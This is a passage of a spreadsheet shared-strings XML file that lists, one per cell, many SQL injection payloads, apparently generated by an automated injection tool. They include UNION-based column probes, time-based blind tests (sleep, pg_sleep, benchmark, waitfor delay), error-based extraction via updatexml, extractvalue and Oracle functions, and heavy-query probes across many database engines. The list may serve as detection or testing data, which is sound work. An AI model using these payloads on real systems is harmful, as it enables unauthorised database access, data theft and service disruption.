    <t>1'  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and "oivc" like "oivc</t>
  </si>
  <si>
    <t>select case when 5346 = 8272 then 1 else null end--</t>
  </si>
  <si>
    <t>-2840'  )  )   )  union all select 3025,3025,3025,3025--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select 1 from generate_series ( 8515,8515,case when  ( 8515 = 3477 )  then 1 else 0 end )  limit 1 ) </t>
  </si>
  <si>
    <t>-5852 )  as anca where 3574 = 3574 or 3958 = 5536#</t>
  </si>
  <si>
    <t>1%' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1" )  and 7533 = 7533 and  ( "jfsw" like "jfsw</t>
  </si>
  <si>
    <t>1'+ ( select 'usoq' where 7783 = 7783 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 9462 = 9462</t>
  </si>
  <si>
    <t>-9820" or 1038 = 7502#</t>
  </si>
  <si>
    <t xml:space="preserve">-5235 )  or make_set ( 9354 = 9354,7185 ) </t>
  </si>
  <si>
    <t>1" )  as jask where 7629 = 7629 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>-6041'  )  )   or make_set ( 9835 = 1367,1367 )  and   (  (  'hxjf' = 'hxjf</t>
  </si>
  <si>
    <t>1' where 9242 = 9242</t>
  </si>
  <si>
    <t>1%"  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'brde' where 7390 = 7390 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) ||'</t>
  </si>
  <si>
    <t>1"  )  )   as xhat where 6674 = 6674 union all select null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  'wyvx' = 'wyvx</t>
  </si>
  <si>
    <t>-4418" or 6872 = 6872 and "gbut" = "gbut</t>
  </si>
  <si>
    <t>1" )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-2230%" union all select 3303,3303,3303--</t>
  </si>
  <si>
    <t>1" )  where 2088 = 2088 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  'gjja' = 'gjja</t>
  </si>
  <si>
    <t>1" )  as ivkw where 4218 = 4218 union all select null--</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'hqcz' = 'hqcz</t>
  </si>
  <si>
    <t>1'|| ( select 'osty' from dual where 6433 = 6433 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'</t>
  </si>
  <si>
    <t>1 )  where 6954 = 6954 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 'zpkv' = 'zpkv</t>
  </si>
  <si>
    <t>-6294" union all select 9921,9921,9921,9921,9921,9921--</t>
  </si>
  <si>
    <t>1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  # eahg</t>
  </si>
  <si>
    <t>1"  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  "fbol" like "fbol</t>
  </si>
  <si>
    <t>1%"  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1  )  )   as hgtl where 3864 = 3864 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-9840  )  )   as thod where 4790 = 4790 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 1</t>
  </si>
  <si>
    <t>select  ( case when  ( 4935 = 4734 )  then 4935 else 4935* ( select 4935 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-9191' )  as qtvm where 2838 = 2838 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1'+ ( select rdwb where 2498 = 2498 and 3429 = 7639--</t>
  </si>
  <si>
    <t>-9272%"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 12</t>
  </si>
  <si>
    <t>select  ( case when  ( 1005 = 5996 )  then 1 else 1005* ( select 1005 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'ksoc' = 'ksoc</t>
  </si>
  <si>
    <t>1'|| ( select 'uvbb' where 7795 = 7795 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7823 = 7823 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) # lgoz</t>
  </si>
  <si>
    <t>1 where 3735 = 3735</t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" where 7158 = 7158</t>
  </si>
  <si>
    <t>-4205' union all select 8986,8986,8986,8986,8986,8986,8986,8986,8986,8986#</t>
  </si>
  <si>
    <t>1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'yhkr' = 'yhkr</t>
  </si>
  <si>
    <t>1' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-1889%'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>-9848' union all select 1359,1359,1359,1359,1359,1359,1359,1359,1359,1359--</t>
  </si>
  <si>
    <t>1%' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'zugq' where 9218 = 9218</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 9505 = 9505</t>
  </si>
  <si>
    <t>-5148"  )  )   or 5310 = 8229</t>
  </si>
  <si>
    <t>select * from generate_series ( 3267,3267,case when  ( 3267 = 5900 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 2205 = 4764,1,1/0 ) </t>
  </si>
  <si>
    <t>-1217'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 1255 = 8025 )  then 1 else 1255* ( select 1255 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 'zxhn' like 'zxhn</t>
  </si>
  <si>
    <t>1  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-1174" union all select 4303,4303,4303,4303#</t>
  </si>
  <si>
    <t>1" )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( "smhd" like "smhd</t>
  </si>
  <si>
    <t>1 )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 1624 = 1624</t>
  </si>
  <si>
    <t>1'+ ( select 'hjku' where 1954 = 1954 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  +'</t>
  </si>
  <si>
    <t>1' )  as kbja where 4275 = 4275 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-9932" union all select 4049,4049,4049--</t>
  </si>
  <si>
    <t>-8040"  )  )   )  or make_set ( 3916 = 6787,6787 )  and   (  (   ( "laar" like "laar</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'cbaj' = 'cbaj</t>
  </si>
  <si>
    <t>1' )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' )  where 3450 = 3450 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' where 9816 = 9816 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1%" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "%" = "</t>
  </si>
  <si>
    <t>1' in boolean mode )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) #</t>
  </si>
  <si>
    <t>-5731" union all select 3083,3083,3083#</t>
  </si>
  <si>
    <t>1%"  )  )   and 1083 = 6202</t>
  </si>
  <si>
    <t>-1766"  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +cha</t>
  </si>
  <si>
    <t>select  ( case when  ( 7990 = 7627 )  then 7990 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1%' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1'+ ( select 'fxhh' where 2571 = 2571 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) </t>
  </si>
  <si>
    <t xml:space="preserve">-8538" or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>1'+ ( select 'qpxk' where 7139 = 7139 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  +'</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( "ymss" = "ymss</t>
  </si>
  <si>
    <t>select 'qqpjq'|| ( select  ( case when  ( 2933 = 2933 )  then 1 else 0 end  )  )  ||'qzvzq'</t>
  </si>
  <si>
    <t>-5924' where 5415 = 5415 union all select 5415,5415,5415,5415,5415,5415#</t>
  </si>
  <si>
    <t>1 )  where 2720 = 2720 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>-1170' union all select 4663,4663,4663,4663,4663,4663,4663,4663#</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 9069 = 9069</t>
  </si>
  <si>
    <t xml:space="preserve">-7164%' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>1%" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1"  )  )   as vbdo where 3882 = 3882</t>
  </si>
  <si>
    <t>1" )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "jhtc" like "jhtc</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( 'ojkd' = 'ojkd</t>
  </si>
  <si>
    <t>-1641'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t>1" )  where 6367 = 6367 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-6130 union all select 3211,3211,3211,3211,3211,3211,3211,3211,3211#</t>
  </si>
  <si>
    <t>1'+ ( select 'iyyv' where 9500 = 9500 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  +'</t>
  </si>
  <si>
    <t>1"  )  )   as tngu where 3644 = 3644 union all select null--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 where 1576 = 1576</t>
  </si>
  <si>
    <t xml:space="preserve">1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>select  ( case when  ( 6166 = 3364 )  then 6166 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  #</t>
  </si>
  <si>
    <t>select  ( case when  ( 8375 = 8318 )  then 8375 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>select  ( case when  ( 1812 = 2446 )  then 1812 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1'+ ( select 'pgje' where 4658 = 4658 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'pygt' from dual where 5543 = 5543 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1" or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 'jutx' = 'jutx</t>
  </si>
  <si>
    <t>1' )  where 1225 = 1225 and elt ( 8831 = 7779,7779 ) --</t>
  </si>
  <si>
    <t>1" and 9468 = 7105--</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-2254' )  as dyrv where 9079 = 9079 union all select 9079,9079,9079,9079,9079,9079,9079,9079#</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "uvvy" like "uvvy</t>
  </si>
  <si>
    <t>1" )  as doai where 7024 = 7024 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  as pyjx where 9005 = 9005</t>
  </si>
  <si>
    <t>-7564' )  as nank where 8095 = 8095 union all select 8095,8095,8095--</t>
  </si>
  <si>
    <t xml:space="preserve">1,iif ( 7475 = 7475,1,1/0 ) </t>
  </si>
  <si>
    <t>1" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and "uvoq" like "uvoq</t>
  </si>
  <si>
    <t>1  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 6556 = 6556</t>
  </si>
  <si>
    <t>1' )  as khaa where 8157 = 8157 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-4617'  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1'|| ( select 'yzdz' where 5021 = 5021</t>
  </si>
  <si>
    <t>1%'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) # bzoq</t>
  </si>
  <si>
    <t>1" where 7599 = 7599</t>
  </si>
  <si>
    <t>select  ( case when  ( 4780 = 4432 )  then 4780 else 4780* ( select 4780 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'mexd' like 'mexd</t>
  </si>
  <si>
    <t>1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'holo' = 'holo</t>
  </si>
  <si>
    <t>select 'qqpjq'|| ( case 5118 when 5118 then 1 else 0 end ) ||'qzvzq' from rdb$database</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">-6770" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>1'+ ( select 'ezpy' where 5282 = 5282 order by 1#</t>
  </si>
  <si>
    <t>if ( 6647 = 2179 )  select 6647 else drop function zvlq--</t>
  </si>
  <si>
    <t>-8264%' )  order by 1#</t>
  </si>
  <si>
    <t>-6971" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1' )  as keom where 7524 = 7524 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%" )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-4866" )  as eyrq where 8365 = 8365 or 1898 = 8320#</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "tkkg" = "tkkg</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( 1435 = 1435</t>
  </si>
  <si>
    <t>1" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "cmhh" like "cmhh</t>
  </si>
  <si>
    <t>-9557%"  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||c</t>
  </si>
  <si>
    <t>1"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "ymhg" = "ymhg</t>
  </si>
  <si>
    <t>1%' and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( 'tnvm' like 'tnvm</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and '%' = '</t>
  </si>
  <si>
    <t>1%" )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'  )  )   as dago where 9788 = 9788</t>
  </si>
  <si>
    <t>1  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 )  as ujjg where 3125 = 3125 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 7571 = 7571 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  as tkkn where 7832 = 7832  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1 where 7362 = 7362 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>-1863' )  or make_set ( 9354 = 9354,7185 )  and  ( 'whwv' = 'whwv</t>
  </si>
  <si>
    <t>-6945' union all select 5063,5063,5063,5063,5063,5063,5063,5063--</t>
  </si>
  <si>
    <t>1%' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-6377'|| ( select 'ryin' where 2113 = 2113 union all select 2113,2113,2113#</t>
  </si>
  <si>
    <t>1 )  as iqkf where 7780 = 7780</t>
  </si>
  <si>
    <t>-5959" or 2477 = 1144</t>
  </si>
  <si>
    <t>1" where 2547 = 2547 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'dphz' = 'dphz</t>
  </si>
  <si>
    <t>1%'  )  )   order by 1#</t>
  </si>
  <si>
    <t>1' where 6135 = 6135</t>
  </si>
  <si>
    <t>1%' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and '%' = '</t>
  </si>
  <si>
    <t>-3666' )  where 6386 = 6386 union all select 6386--</t>
  </si>
  <si>
    <t>1'  )  )   as kxek where 3429 = 3429 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  where 4951 = 4951</t>
  </si>
  <si>
